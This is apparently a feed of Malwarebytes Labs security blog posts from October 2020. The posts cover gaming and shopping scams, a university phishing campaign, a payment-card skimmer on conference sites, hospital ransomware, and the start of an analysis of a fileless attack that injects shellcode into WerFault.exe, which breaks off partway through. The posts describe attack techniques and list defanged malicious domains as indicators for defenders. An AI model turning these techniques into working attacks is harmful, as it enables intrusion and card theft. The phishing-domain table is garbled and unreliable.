The post QR code scams are making a comeback appeared first on Malwarebytes Labs.

Categories: Malware Bytes

FIFA 21 game scams: watch out for unsporting conduct

Malware Bytes Security - Wed, 10/14/2020 - 11:30am

Despite COVID-19, soccer season is slowly ebbing its way back into daily life around the world. It’s also sneaking back onto TV screens in the form of huge-budget video games. Step up to the plate, FIFA 21.

FIFA games: the football juggernaut

The FIFA series is an absolute monster in terms of sales, clocking in at around 280 million copies across 51 countries over the lifetime of the franchise. According to the Guinness World Records, it’s the best-selling sports video game franchise in the world. It’s also premium bait for scammers as a result, with an enormous selection of potential victims to choose from. It’s incredibly popular with teens and younger children too, which simply increases the risk from both clever and incredibly basic attacks.

FIFA 21 launched last week, and it’s no doubt selling like hotcakes. If you’re unsure about the risks and what you should steer clear of, you’ve come to the right place. A lot of this is dependent on platform, and how deeply embedded your social media accounts are embedded into your gaming ecosphere. With that out of the way, let’s untangle any confusion you may have and avoid an own goal.

The lay of the land: explaining FIFA mechanics

It’s quite possible your kids own a few of the FIFA titles. You may well hear them talk about coins, or FUT, and speak at length about playing cards. Cards? In my football game? It’s more likely than you think. Before you can fathom the kinds of scams targeting your family members, it helps to understand the inner-workings of the title.

FUT: FIFA Ultimate Team. This is a wildly popular competitive game mode nestled inside various FIFA titles, which involves cards and coins in a continued quest for victory.

Coins: FIFA coins are the in-game currency used to perform various game related buying/selling activities. You earn coins simply by playing the game, completing challenges and objectives.

The coins stay in-game only. You’re not allowed to buy them from third parties, distribute them, or use multiple accounts to direct coins to a “main” account. Giveaways, or performing other actions to obtain coins, are all forbidden.

What do you do with the coins once you have enough of them? You spend them on cards.

Cards: The lifeblood of the game. The cards represent players in your team and come in various levels of quality. The rarer the card, the more coins they probably cost to purchase.

So far, so good…and essentially harmless. Unfortunately, the monetised aspects of the game away from the screen contributes to scammers wanting a piece of the action.

Extra-curricular activities: playing outside the game

You don’t need to spend in-game coins to purchase cards on the transfer market. Gamers can also buy “FIFA points”, sold inside the game, the relevant store for your gaming platform, or legitimate sellers. They buy these points with real money, as opposed virtual currencies. The monetisation of the game is red meat in the water to scammers.

Anything tied up in real world cash immediately offers several inroads to fakery. Arguments against this style of monetisation are also compelling. Desperation for coins / points means potentially being more susceptible to scams.

Common FIFA game scams Gift generators:

These target the platform you play on. It might be PC, it could be console. They might specify Steam, another store, or even something else altogether. They’ll offer up coins, free game keys, points, activation codes, money, whatever it takes. “All” you have to do is fill in a survey, or hand over your login details, or buy giftcards and send them the codes.

Perhaps your personal data is now in the hands of third party marketers, while potentially being out of pocket. Maybe you’re dealing with account compromise. You will commonly find these promoted on forums and YouTube videos.

Fake customer support assistance:

A tactic which has been around for a few years now, and frequently successful. Scammers will often pretend to be customer support reps, then insert themselves into support discussions on social media. The victim eventually lands on a phishing page. While we first came across this targeting FIFA gamers, the tactic was soon observed being used in banking scams too.

Social media fakeouts:

It’s the easiest thing in the world for scammers to create bogus pages on social media. It’s common to see fake accounts on Instagram and Facebook, and as usual the aim is to direct victims to phishing pages. If a major sporting event is taking place, they’ll probably craft banner imagery and general discussion towards said event in order to make it more convincing.

It’s also quite common for them to deploy bots in the comments to make it look as though the website/offer really works. Don’t take dozens of “this is genuine, thank you” messages for granted.

Bogus Direct Messages:

Scammers will pretend to be game admins, or console developers, or promoters. They’ll push the line that you’ve been selected for a special in-game reward, or a points offer. A technical issue may have occurred, and they need your login details to verify “something”. Perhaps they’ll claim your account has been restricted, and jumping through their hoops is the only way you’ll get your account back.

Whatever they claim, rest assured it’s all going to be nonsense. Nobody should ever ask for login credentials, and especially not in such casual fashion. All attempts sent your way should be blocked and reported on your platform. This will help to keep other people safe, too.

An increasingly wide playing field

EA titles recently returned to Steam, having been absent for some years. As each gaming platform has its own set of security protocols, parents and gamers need to keep up with how things work on each.

In a recent interview with The Daily Swig, I touched on aspects of microtransactions with regards to a rise in attacks during the pandemic lockdown. If you limit the time available for in-game items, or dabble in rarity as a reward, then younger gamers will gravitate towards parents who often hold the digital keys to the kingdom. Buy this, buy that, now buy six more of these.

What this means in practice, is endlessly jumping into one or more email accounts to authorise logins, transactions, trades, and more. Those accounts may also require several steps of authentication to login. Eventually, some parents will simply drop some security features in order to make things less of a hoop-jumping exercise.

At that point, the accounts are now vulnerable to attack. Streamlining games which require multiple platform logins, authentication, in-game validation, and email activity on a regular basis isn’t easy and that’s what scammers rely on.

Blow the whistle, referee

Whether your game of choice is FIFA or something else entirely, keep the above tips in mind. Ensure you’re aware of the latest FIFA scams doing the rounds and take some time to figure out security practices that work for you on your selected platform. Every small step you make towards keeping scammers out makes it harder for them to score the winning goal.

The post FIFA 21 game scams: watch out for unsporting conduct appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Silent Librarian APT right on schedule for 20/21 academic year

Malware Bytes Security - Wed, 10/14/2020 - 9:29am

A threat actor known as Silent Librarian/TA407/COBALT DICKENS has been actively targeting universities via spear phishing campaigns since schools and universities went back.

We were initially tipped off by one of our customers, and were able to identify a new active campaign from this APT group. Based off a number of intended victims, we can tell that Silent Librarian does not limit itself to specific countries but tries to get wider coverage.

Even though many phishing sites have been identified and taken down, the threat actor has built enough of them to continue with a successful campaign against staff and students alike.

A persistent threat actor with a perfect attendance record

In March 2018, nine Iranians were indicted by the US Department of Justice for conducting attacks against universities and other organizations with the goal of stealing research and proprietary data.

Yet, both in August 2018 and 2019 Silent Librarian was lining up for the new academic years, once again targeting the same kind of victims in over a dozen countries.

IT administrators working at universities have a particularly tough job considering that their customers, namely students and teachers, are among the most difficult to protect due to their behaviors. Despite that, they also contribute to and access research that could be worth millions or billions of dollars.

Considering that Iran is dealing with constant sanctions, it strives to keep up with world developments in various fields, including that of technology. As such, these attacks represent a national interest and are well funded.

Same pattern in phishing domain registration

The new domain names follow the same pattern as previously reported, except that they swap the top level domain name for another. We know that the threat actor has used the “.me” TLD in their past campaigns against some academic intuitions and this is still the case, along side “.tk” and “.cf”.

Phishing siteLegitimate University of Adelaide University of Adelaide Caledonian Universityblackboard.stonybrook.ernn.meblackboard.stonybrook.eduStony Brook Universityblackboard.stonybrook.nrni.meblackboard.stonybrook.eduStony Brook Utrechtuu.blackboard.rres.meuu.blackboard.comUniversiteit of of of Medical of oföteborg University’s College Mary University of Victoria Technological of Mittelhessen University of Applied of North of CambridgeTable 1: List of phishing sites and targets

Registering these subdomains to perform phishing attacks against universities is a known behavior for this APT group and therefore we can expect that they were registered by the same actor.

Figure 1: Phishing site for the University of Adelaide Phishing sites hosted in Iran

The threat actor uses Cloudflare for most of their phishing hostnames in order to hide the real hosting origin. However, with some external help we were able to identify some of their infrastructure located on Iran-based hosts.

It may seem odd for an attacker to use infrastructure in their own country, possibly pointing a finger at them. However, here it simply becomes another bulletproof hosting option based on the lack of cooperation between US or European law enforcement and local police in Iran.

Figure 2: Part of the phishing infrastructure showing connections with Iran

Clearly we only uncovered a small portion of this phishing operation. Although for the most part the sites are taken down quickly, the attacker has the advantage of being one step ahead and is going for many possible targets at once.

We are continuing to monitor this campaign and are keeping our customers safe by blocking the phishing sites.

Indicators of Compromise (IOCs)



The post Silent Librarian APT right on schedule for 20/21 academic year appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Amazon Prime Day—8 tips for safer shopping

Malware Bytes Security - Tue, 10/13/2020 - 6:11am

Avid Amazon Prime Day shoppers may have been worried they’d missed it this year—thanks coronavirus. Fear not, last month Amazon announced Prime Day will take place three months after its original annual date, beginning today. And this year, it’ll take place over two days, rather than one.

This could mark the beginning of early “peak season” holiday shopping, which usually happens a week before Thanksgiving.

That said, it’s time to brush up on our cybersecurity wits so we can shop early, safely, and save ourselves future headaches in the new shopping season.

How to shop Amazon Prime Day the practical and cyber-sensible way 1. Secure your Amazon Prime account

You can do this by setting up two-factor authentication (2FA)—if you haven’t already done it. Many websites these days already have a secondary means to authenticate either a session or the user. As an Amazon user, you should know that Amazon has been using this security feature for a long time now. If you’re not aware of this, go to your local Amazon Help & Customer Service page and search for “two-factor authentication” to get yourself started.

2. Use only your credit card when buying online

When it comes to which card to use when buying things online, you cannot go wrong with using a credit card over a debit card. Why? Because credit cards have fraud protection in place whereas bank cards, often, don’t have any.

3. Use Amazon’s official app

You can download this from both the Google Play and Apple App stores. Not only would doing so be convenient, it’s also safer, as long as you’re using the legitimate one of course. It’s safe to assume that cybercriminals wouldn’t pass up on Prime Day, whether the date had been moved this year or not, given that Amazon is such a household name they can bank on.

4. Use your Alexa to shop

This may sound counterintuitive, given that we cannot stress enough how vulnerable and unsecure IoT devices are. But you can still use your Alexa to shop, just make sure you do it with with security and privacy in mind. By this, we mean Alexa shouldn’t be activated straight away, from the box into the boudoir. So make sure you take the time and effort to set up your personal assistant based on the level of privacy you want the device to give you. Here are several points to consider:

  • Make sure you secure your home network first.
    • Have you changed the default name of your home Wi-Fi?
    • Is your router firewall enabled?
    • Are you using the router’s default credentials?
    • Is your wireless network password the strongest you can make it?
    • Is your router’s firmware updated?
    • Have you disabled router features you don’t really need or use?
  • Manage Alexa’s voice recording.
    • You can do this by setting it to automatically delete voice recordings at the earliest setting, which is 3 months. If you think this is too long, you can manually delete the recordings yourself.
  • Disable the feature that allows users to improve Alexa’s transcription capabilities.
  • Lock certain voice purchase commands behind a PIN.
  • Turn off your Alexa (or its microphone) when not in use.
5. Buy only from sellers you are comfortable buying products from

This may seem like an easy decision, but when you’re already on your computer or phone and see something you really want—which isn’t on your shopping list, by the way—make sure your want doesn’t blind you to the seller’s reputation. When you find yourself in this position, ask yourself these questions: Would it really be such a hassle for me if I check what other buyers have to say about this seller first before I buy something from them? Do the reviews seem to have come from actual buyers and not paid reviewers? How long has this supplier been selling on Amazon? Is this deal too good to be true?

6. Get to know Amazon’s policies

If you encounter a suspicious email, call, text message, or webpage claiming to be from Amazon or someone associated with the company, would you know what to do? Familiarize yourself with Amazon’s policies so you can stay one step ahead of the scammers.

7. Use a VPN, especially when you’re shopping on-the-go

Everyone knows that public Wi-Fi is generally considered dicey. As such, users are advised to connect to public Wi-Fi with caution else you run the risk of compromising your privacy, along with your credentials and personally identifiable information (PII). One way to address this is to use VPNs on a secured (password-protected, in other words) public network. The caveat here, of course, is that you should pick a mobile VPN app that doesn’t just talk the talk.

The other way is to not shop on-the-go at all.

8. Familiarize yourself with potential scams that are aimed at Amazon users like you

Knowing is half the battle. Read up and remind yourself that a known cybercriminal modus operandi (MO) is to target users who aren’t aware and/or who seem to not care about their security and privacy. Once you have an idea of their MO, you’re more likely to be on the lookout and, in turn, avoid the scams.

9. Security beyond Prime Day

Shopping season is unlikely to end with Prime Day, and nor should our vigilance as online shoppers. This way, we can keep our data and PII as secure and far away from the grasp of online criminals as possible. Amazon is one of the many platforms we use to shop. But what we have outlined here can be tweaked to apply to others.

Have a happy, exciting, and safe shopping journey ahead!

The post Amazon Prime Day—8 tips for safer shopping appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Lock and Code S1Ep17: Journalism’s role in cybersecurity with Alfred Ng and Seth Rosenblatt

Malware Bytes Security - Mon, 10/12/2020 - 11:00am

Most everything about cybersecurity—the threats, the vulnerabilities, the breaches and the blunders—doesn’t happen in a vacuum. And the public doesn’t learn about those things because threat actors advertise their exploits, or because companies trumpet their lackluster data security practices.

No, we often learn about cybersecurity issues because of reporting. And as the years have progressed, the stories have only become more intertwined into our everyday lives. We learn whether our products are safe to use, we read about how to safely browse online, and we try to understand why an app might suddenly disappear from the Apple App Store.

To help us better understand the role of journalism in cybersecurity—how the public’s attention has broadened over many years, how a cybersecurity threat is deemed newsworthy, and how to avoid advice that serves no one—we’re talking today to Alfred Ng, senior reporter for CNET, and Seth Rosenblatt, editor-in-chief for The Parallax. 

You can also find us on the Apple iTunes storeGoogle Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:
  • A mobile network operator falls into the hands of Fullz House Magecart group.
  • A fileless APT attack abuses Windows Error Reporting service using a ‘your right to compensation’ lure.
  • The risky business stemming from the fact that a majority of people use work devices for personal use.
  • An update about the state of healthcare security instigated by a case in Germany where a woman died as a result of a ransomware attack.
  • More credit card skimmers, this time the target was a virtual conference platform.
Other cybersecurity news:
  • A new AI software tool to be developed for the U.S. Air Force and Special Operations Command may help to counter disinformation. (Source: Defense One)
  • Hackers have launched a sprawling, multifaceted cyber-attack against the state of Washington, according to two people familiar with the matter. (Source: Bloomberg)
  • The United States has seized 92 domain names that were unlawfully used by Iran’s Islamic Revolutionary Guard Corps (IRGC) to engage in a global disinformation campaign. (Source: US Department of Justice)
  • Sam’s Club has started sending automated password reset emails and security notifications to customers who were hacked in credential stuffing attacks. (Source: BleepingComputer)
  • The International Maritime Organization (IMO), a fully fledged United Nations entity, has become the latest high profile shipping victim of a cyber attack. (Source: Splash 247)

Stay safe, everyone!

The post Lock and Code S1Ep17: Journalism’s role in cybersecurity with Alfred Ng and Seth Rosenblatt appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Credit card skimmer targets virtual conference platform

Malware Bytes Security - Thu, 10/08/2020 - 3:57pm

We’ve seen many security incidents affecting different websites simultaneously because they were loading the same tampered piece of code. In many instances, this is due to what we call a supply-chain attack, where a threat actor targets one company that acts as an intermediary to others.

In today’s case, the targeted websites all reside on the same server and sell video content from various conferences and conventions. The host control panel belongs to Playback Now, a company that provides its customers with an array of services to capture and deliver recorded material into an online conference experience.

Criminals decided to impersonate Playback Now by registering a malicious domain lexically close to their official website that could be used to discreetly serve a credit card skimmer as well as collect stolen data.

Their next move was to inject a malicious reference to this skimmer code into dozens of Magento sites hosted on the same IP address belonging to Playback Now. As a result, the financial details from customers shopping for conference material were now at risk.

Online conference sites compromised with Inter skimming kit

Playback Now provides organizations with an easy way to seamlessly convert an event into an online virtual experience. Conferences and seminars can be delivered via live streaming, on demand, or a hybrid of the two.

Their offering of a virtual conference expo hall seems like a timely solution during the pandemic for organizers and exhibitors to connect with customers just like at an in-person event.

Businesses or organizations that want to join the experience can get a dedicated website from where they will serve and promote their content. Take the following website built for the Association of Healthcare Internal auditors.

Once users have registered and purchased one of the packages, they can access recorded sessions online or save them onto a flash drive.

A closer look at the website’s source code reveals an external reference to a JavaScript file. It would be easy to overlook, thinking it is served from the legitimate Playback Now website (, but there is an extra ‘s’ in that domain name (playbacknows[.]com) that gives it away.

That domain was registered only a couple of weeks ago and its home page is void of any content.

Domain name: Creation Date: 2020-09-21T20:22:10.00Z Registrar: NAMECHEAP INC Registrant Name: WhoisGuard Protected Registrant Street: P.O. Box 0823-03411  Registrant City: Panama

In total, we detected the reference to this domain in over 40 websites belonging to different organizations (see the IOCs section of this blogpost).

This JavaScript is a skimmer that has been lightly obfuscated and contains a certain number of strings that are a common marking for the Inter skimming kit.

When someone purchases a course or conference recording, their personal and credit card data will be leaked to criminals via the same malicious domain housing the skimmer.

Breach possibly related to Magento 1.x exploit

All affected Playback Now customer sites are running on the same IP address at Using VirusTotal Graph we can see an interesting connection with a piece of malware we previously documented.

This GoLang sample attempts to bruteforce access into a variety of Content Management Systems. If successful, attackers could use the gained credentials to inject malicious code into e-commerce sites.

This connection was interesting but lost some value when we looked at the submission date for this sample to VirusTotal. It’s quite likely that the server was pinged just like many others, but it’s unclear whether it would have resulted in a breach, even at a later date.

Based on an analysis of the compromised Playback Now related sites, we found they were running a vulnerable version of the Magento CMS, namely version 1.x. Following the release of an exploitation tool, a wave of attacks was recently observed, compromising over two thousand sites.

Given the timeline, this incident could have been leveraging the same exploit and be carried out by the same or perhaps a different group.

The official website is hosted on as well, but it does not appear to be compromised. One thing to note though is that it is running a different CMS, namely WordPress version 5.4.

We contacted Playback Now to report this breach. In the meantime, Malwarebytes Browser Guard detects and blocks the fraudulent skimmer domain.

Indicators of Compromise (IOCs)



Compromised sites

WebsiteOrganizationplaybacknar[.]comNational Association of Realtorsnaraei[.]playbacknow[.]comNational Association of Realtorsnais[.]playbacknow[.]comNational Association of Independent Schoolsnasmm[.]playbacknow[.]comNational Association of Senior Move Managerstripleplay[.]playbacknow[.]comTriple Playdigitaldealer[.]playbacknow[.]comDigital Dealerplaybackaaj[.]comAmerican Association for Justiceplaybackacp[.]comAmerican College of Physiciansplaybacksmilesource[.]comSmile Sourceplaybackc21[.]comCentury 21 Universityplaybackada[.]comAmerican Diabetes Associationplaybacknailba[.]comNAILBAplaybackswana[.]comSWANAplaybacknaspa[.]comNASPAplaybackaupresses[.]comAssociation of University Pressesplaybacknacba[.]comNACBAplaybackaca[.]comACA Internationalplaybacknala[.]comNALA Paralegal Associationplaybacknatp[.]comNational Association of Tax Professionalsiplayback[.]com–playbackcore[.]com–playbackndsc[.]comNational Down Syndrome Congressplaybackaata[.]comAmerican Art Therapy Associationplaybacksnrs[.]comSouthern Nursing Research Societyplaybackssp[.]comSociety for Scholarly Publishingplaybackcaregiving[.]comCaregivingplaybackcas[.]comCasualty Actuarial Societyplaybackmpc[.]comMidwest Podiatry Conferenceplaybackhinman[.]comHinman Dentalplaybacknetworker[.]comPsychotherapy Networkerplaybacknara[.]comNational Association for Regulatory Administrationaspcvirtualsummit[.]orgAmerican Society for Preventive Cardiologyplaybackfgs[.]comNational Genealogy Societyplaybackifa[.]comInternational Franchise Associationplaybackashe[.]comAssociation for the Study of Higher Educationplaybackippfa[.]comIPPFAplaybackahri[.]comAir Conditioning Heating Refrigeration Instituteplaybackaonl[.]comAmerican Organization for Nursing Leadershipplaybackngs[.]comNational Genealogy Societyplaybackrlc[.]comRestaurant Law Centerplaybackahia[.]comAssociation of Healthcare Internal Auditorsplaybacknacac[.]comNational Association for College Admission Counseling

Server hosting compromised sites

The post Credit card skimmer targets virtual conference platform appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Healthcare security update: death by ransomware, what’s next?

Malware Bytes Security - Thu, 10/08/2020 - 11:30am

A recent ransomware attack which played a significant role in the death of a German woman has put into focus both the dangers and the importance of cybersecurity today. But it has also led some to point fingers as to who was responsible.

As usual, playing the blame game helps no one, but it does remind us of the dire need to work on healthcare security.

What happened?

A few weeks ago, the university hospital Uniklinikum in the German city of Düsseldorf suffered a ransomware attack. The hospital decided not to admit new patients until it resolved the situation and restored normal operations.

Because of the admissions stop, a woman in need of immediate help had to be driven to the hospital of Wuppertal which is about 20 miles further. Unfortunately, she died upon arrival. The extra 30 minutes it took to get her to the next hospital turned out to be fatal.

As it turned out, the target of the ransomware gang was not even the hospital, but the university the hospital belongs to. When the attackers learned that the hospital had fallen victim as well, they handed over the decryption key for free. Despite that key, it took the hospital more than two weeks to reach a level of operability that allowed them to take on new patients.

This is not only tragic because the woman might have been saved if the university hospital had been operational, but also because it demonstrates once more how one of the most important parts of our infrastructure is lacking adequate defenses against prevalent threats likes ransomware.

What are the main problems facing healthcare security?

In the past we have identified several elements that make the healthcare industry, and hospitals in particular, more vulnerable to cyberthreats than many other verticals.

Here are some of those problem elements:

  • The Internet of Things (IoT): Due to their nature and method of use, you will find a lot of IoT devices in hospitals that all run on different operating systems and require specific security settings in order to shield them from the outside world.
  • Legacy systems: Quite often, older equipment will not run properly under newer operating systems which results in several systems that are running on an outdated OS and even on software that has reached the end-of-life point. This means that the software will no longer receive patches or updates even when there are known issues.
  • Lack of adequate backups: Even when the underlying problem has been resolved, it can take far too long for an attacked target to get back to an operational state. Institutes need to at least have a backup plan and maybe even backup equipment and servers for the most vital functions so they can keep them running when disaster strikes.
  • Extra stressors: Additional issues like COVID-19, fires, and other natural disasters can cut time and push aside the need to perform updates, make backups, or think about anything cybersecurity related. These stressors and other reasons are often referred to as “we have more important things to do.”
IoT security risks

Many medical devices that investigate and monitor the patient are connected to the internet. We consider them to be part of the Internet of Things (IoT). This group of devices comes with its own set of security risks, especially when it comes to personally identifiable information (PII).

In every case it is advisable to investigate whether the devices’ settings allow to approach it over the intranet instead of the internet. If possible, that makes it easier to shield the device from unauthorized access and keep the sensitive data inside the security perimeter.

Legacy systems

Medical systems come from various suppliers and in any hospital you will find many different types. Each with their own goal, user guide, and updating regime. For many legacy systems, the acting rule of thumb will be not to tinker with it if it works. The fear of a system failure outweighs the urgency to install the latest patches. And we can relate to that state of mind except when applied to security updates on a connected system.

Disaster stress

Okay, here comes our umpteenth mention of COVID-19—I know, but it is a factor that we can’t ignore.

The recent global pandemic contributes to the lack of time that IT staff at many healthcare organizations feel they have. The same is true for many other disasters that require emergency solutions to be set up.

In some cases, entire specialized clinics were built to deal with COVID-19 victims, and to replace lost capacity in other disasters like wildfires and earth slides.

More important matters at hand?

It’s difficult to overstate the importance of “triage” in the healthcare system. Healthcare professionals like nurses and doctors likely practice it every day, prioritizing the most critical patient needs on a second-by-second basis.

It should serve as no surprise that triaging has a place in IT administration, too. Healthcare facilities should determine which systems require immediate attention and which systems can wait.

Interestingly, the CISO of the hospital which suffered from the ransomware attack was accused of negligence in some German media. Law enforcement in Germany is moving forward with both trying to identify the individuals behind the ransomware attack, as well as potentially charging them with negligent manslaughter because of the woman’s death.

While we can hardly blame the CISO for the woman’s death, there may come a time when inadequate security and its results may carry punishment for those responsible.

Ransomware in particular

The ransomware at play in the German case was identified as DoppelPaymer and it was determined to be planted inside the organization using the CVE-2019-19781 vulnerability in Citrix VPNs.

In more recent news, we learned that UHS hospitals in the US were hit by Ryuk ransomware.

It’s also important to remember that the costs of a ransomware attack are often underestimated. People tend to look only at the actual ransom amount demanded, but the additional costs are often much higher than that.

It takes many people-hours to restore all the affected systems in an organization and return to a fully operational state. The time to recover will be lower in an organization that comes prepared. Having a restoration plan and adequate backups that are easy to deploy can streamline the process of getting back in business. Another important task is to figure out how it happened and how to plug the hole, so it won’t happen again. Also, a thorough investigation may be necessary to check whether the attacker did not leave any backdoors behind.

There’s a problem for every solution

Security will probably never reach a watertight quality, so besides making our infrastructure, especially the vital parts of it, as secure as possible, we also need to think ahead and make plans to deal with a breach. Whether it’s a data breach or an attack that cripples important parts of our systems, we want to be prepared. Knowing what to do—and in what order—can save a lot of time in disaster recovery. Having the tools and backups at hand is the second step in limiting the damages and help with a speedy recovery.

To sum it up, you are going to need:

  • Recovery plans for different scenarios: data breaches, ransomware attacks, you name it
  • File backups that are recent and easy to deploy or another type of rollback method
  • Backup systems that can take over when critical systems are crippled
  • Training for those involved, or at least an opportunity to familiarize them with the steps of the recovery plans

And last but not least, don’t forget to focus on prevention. The best thing about a recovery plan is when you never need it.

Stay safe, everyone!

The post Healthcare security update: death by ransomware, what’s next? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Risky business: survey shows majority of people use work devices for personal use

Malware Bytes Security - Wed, 10/07/2020 - 11:30am

There’s no denying the coronavirus pandemic is having a significant impact on the way we use technology. Some changes feel like a subtle acceleration of behavioral shifts that were already well underway (i.e. more online shopping and more streaming TV/movies).

Other changes are more extreme and we’re only beginning to understand the long-term effects. One of the biggest changes has to do with the way people work. More people are working from home than ever before and many are doing so for the very first time.

Now, combine these newly appointed remote workers with company-owned hardware and things are bound to go wrong. Right?

When it comes to light duty personal tasks like checking email, reading the news, or shopping online, most people who are working from home during the pandemic have no qualms about doing so on a work assigned device. The reason? It’s convenient, it’s believed to be low risk, and, in many cases, it’s allowed. Comparatively, few remote workers avoid any and all personal activities on their work hardware.

These findings and more come out of the latest Malwarebytes Labs reader survey on working from home during the coronavirus pandemic.

Business cybersecurity: perception vs. reality

Before we dig into the results of this new survey, we need to get a little context by looking back at an earlier survey Malwarebytes Labs conducted in August. In this study of the impact of COVID-19 on business cybersecurity, the Labs team spoke with 200 managers, directors, and C-suite executives in IT and cybersecurity roles at companies across the US to determine how their security posture has changed since the start of the pandemic. Sure enough, many companies were caught flatfooted, with 24 percent saying they incurred unexpected expenses relating to a cybersecurity breach or malware attack following shelter-in-place orders. Another 20 percent of respondents said they faced a security breach as a result of a remote worker.

The Labs team wanted to get a better understanding of how and why these security breaches happened. Are remote workers engaging in risky behavior that might open employers up to a potential security breach? To get answers, we went straight to our readers.

We asked Labs readers if they worked from home and, if so, did they have a work device provided by their employer. For the purposes of this survey we defined a work device as a desktop computer, laptop, smartphone, or tablet.

Of the 900 readers who took the survey, 77.5 percent said they currently work from home. About half of at-home workers, 52.7 percent, said they had a work assigned device.

In the earlier study focused on IT leaders, 47 percent said they were confident that their employees were “very aware” of cybersecurity best practices when working from home. Only 17.3 percent believed their employees were “acutely aware and mindful to avoid risk.” A mere 5.4 percent said their employees were “oblivious and risky.” 

The results of the latest reader survey appear to support these assessments. 

When we asked Labs readers if they used a work device to perform personal tasks not relating to work, most people said they felt comfortable performing seemingly low risk everyday tasks. Specifically, 52.6 percent said they sent or received email, while 52 percent said they read the news. Another 37.8 percent said they shopped online, and 25 percent said they checked their social media. 

As for why, most people said it was convenient:

“I’m using the work device during the day, no point starting up my own personal device just to do something I could do on the device I’m already sitting at and using.”

  A smaller group of respondents said it was expressly allowed by their employer:

“Work policy allows some personal use outside of work times—read Washington Post, New England Journal of Medicine, Zoom with friends.”

A few said they didn’t have the luxury of switching to a personal computer:

“Kids are using the family computer, I’m already on my work computer.”

For a significant chunk of readers, breaking the monotony of day-to-day WFH life was worth any potential risk. Some 25 percent of respondents said they streamed music, while 24 percent said they streamed videos or movies.

“Easier to stream (within reason) background music and videos while working rather than switch to a dedicated device. Same with reading news and other activities that do not require a personal account sign-in.”

A small, but impressive 30 percent of respondents said they never performed any kind of personal activity on a work assigned device. When asked why, most said something to the effect of “It’s not my computer.”

“I don’t. When I’m tempted to, it’s because it’s easier to not switch to another device or because my work computer has better software than my personal computer. But it’s not my machine so I don’t.”

Others said that personal use was forbidden or outright restricted:

“I work for the government. They monitor computer usage, so no personal stuff done on the work laptop.”

Risky business for remote workers

Remote workers who engaged in online behavior that could be considered high risk were relatively few. Of those surveyed, 22 percent said they downloaded or installed an application on work systems. Another 6.5 percent of respondents said they used a work device as a WiFi hotspot for other devices. Possibly taking advantage of more powerful work hardware, 4.6 percent said they played video games.

It’s worth noting, gamers are a favorite target for cybercriminals. Malwarebytes Labs has reported on cheat tools that contain hidden malware, in-game currency scams, and phishing sites that lure victims in with the promise of “free” games.

Setting boundaries

At this point, you’re probably wondering why there’s no data about how many remote workers used work devices to connect to unsecure public WiFi networks. Varying shelter-in-place restrictions and the closure of many facilities that offer public WiFi (like coffee shops and restaurants) make it nigh impossible to get accurate data on the subject. If anything, we’ll save that question for a future survey. 

For now, it’s safe to say most people working from home are doing so safely. However, the onus is on employers to set clear boundaries around what employees can and cannot do with the company hardware.

One survey respondent summed it up best:

“Pure convenience. The work laptop is fully set up with a dock and connections to keyboard, mouse, external monitor, and wired Internet … So, short answer: I’m lazy.”

The same respondent added:

“It’s probably worth noting that the employer has a reasonable set of safeguards on the laptop itself—I could not, for example, randomly download new software, nor visit certain non-safelisted sites.”

If you’re a business owner, short of placing draconian restrictions on what your remote workers can and can’t do with their work devices, now is a good time to remind employees about work device protocols. Finally, we would be remiss without mentioning Malwarebytes offers endpoint protection solutions that keep your employees, devices, and network safe if and when a remote worker clicks a bad link, opens an infected attachment, or visits a malicious website.

The post Risky business: survey shows majority of people use work devices for personal use appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Release the Kraken: Fileless APT attack abuses Windows Error Reporting service

Malware Bytes Security - Tue, 10/06/2020 - 11:00am

This blog post was authored by Hossein Jazi and Jérôme Segura.

On September 17th, we discovered a new attack called Kraken that injected its payload into the Windows Error Reporting (WER) service as a defense evasion mechanism.

That reporting service, WerFault.exe, is usually invoked when an error related to the operating system, Windows features, or applications happens. When victims see WerFault.exe running on their machine, they probably assume that some error happened, while in this case they have actually been targeted in an attack.

While this technique is not new, this campaign is likely the work of an APT group that had earlier used a phishing attack enticing victims with a worker’s compensation claim. The threat actors compromised a website to host its payload and then used the CactusTorch framework to perform a fileless attack followed by several anti-analysis techniques.

At the time of writing, we could not make a clear attribution to who is behind this attack, although some elements remind us of the Vietnamese APT32 group.

Malicious lure: ‘your right to compensation’

On September 17, we found a new attack starting from a zip file containing a malicious document most likely distributed through spear phishing attacks.

The document “Compensation manual.doc” pretends to include information about compensation rights for workers:

Figure 1: Malicious Document

The file contains an image tag (“INCLDEPICTURE“) that connects to “yourrighttocompensation[.]com” and downloads an image that will be the document template.

Figure 2: Imagetag embedded within the document Figure 3: yourrighttocompensation website

This domain was registered on 2020-06-05 while the document creation time is 2020-06-12, which likely indicates that they are part of the same attack.

Inside, we see a malicious macro that uses a modified version of CactusTorch VBA module to execute its shellcode. CactusTorch is leveraging the DotNetToJscript technique to load a .Net compiled binary into memory and execute it from vbscript.

The following figure shows the macro content used by this threat actor. It has both AutoOpen and AutoClose functions. AutoOpen just shows an error message while AutoClose is the function that performs the main activity.

Figure 4: Macro

As you can see in Figure 4, a serialized object in hex format has been defined which contains a .Net payload that is being loaded into memory. Then, the macro defined an entry class with “Kraken.Kraken” as value. This value has two parts that have been separated with a dot: the name of the .Net Loader and its target class name.

In the next step, it creates a serialization BinaryFormatter object and uses the deseralize function of BinaryFormatter to deserialize the object. Finally, by calling DynamicInvoke the .Net payload will be loaded and executed from memory.

Unlike CactusTorch VBA that specifies the target process to inject the payload into it within the macro, this actor changed the macro and specified the target process within the .Net payload.

Kraken Loader

The loaded payload is a .Net DLL with “Kraken.dll” as its internal name, compiled on 2020-06-12.

This DLL is a loader that injects an embedded shellcode into WerFault.exe. To be clear, this is not the first case of such a technique. It was observed before with the NetWire RAT and even the Cerber ransomware.

The loader has two main classes: “Kraken” and “Loader“.

Figure 5: Kraken.dll

The Kraken class contains the shellcode that will be injected into the target process defined in this class as “WerFault.exe“. It only has one function that calls the Load function of Loader class with shellcode and target process as parameters.

Figure 6: Kraken class

The Loader class is responsible for injecting shellcode into the target process by making Windows API calls.

Figure 7: Load function

These are the steps it uses to perform its process injection:

  • StartProcess function calls CreateProcess Windows API with 800000C as dwCreateFlags.
  • FindEntry calls ZwQueryInformationProcess to locate the base address of the target process.
